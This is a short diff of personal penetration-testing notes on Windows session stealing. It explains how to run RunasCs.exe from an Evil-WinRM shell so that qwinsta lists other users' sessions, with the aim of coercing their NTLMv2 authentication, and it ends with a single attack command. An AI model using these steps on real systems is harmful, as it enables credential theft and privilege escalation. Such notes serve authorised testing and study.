slom64/MyNotes/A Method/PrivEsc/Windows/Session Stealing.md

+> [!Attention]
+> `qwinsta` won't work properly if you used winrm, because its disabled from registry to be used in remote management and it will show no sessions even though there are sessions running already.
+Its only accessible from local connections, thats why we are using RunasCs.exe to trick windows to think we are in local connection.

 If you saw another user that having a session on the computer right now  with you `qwinsta`, use this to coarce NTMLv2.
 THIS WORK EVEN IF NTLMv2 disabled.
 ```powershell
 *Evil-WinRM* PS C:\programdata> .\RunasCs.exe x x qwinsta -l 9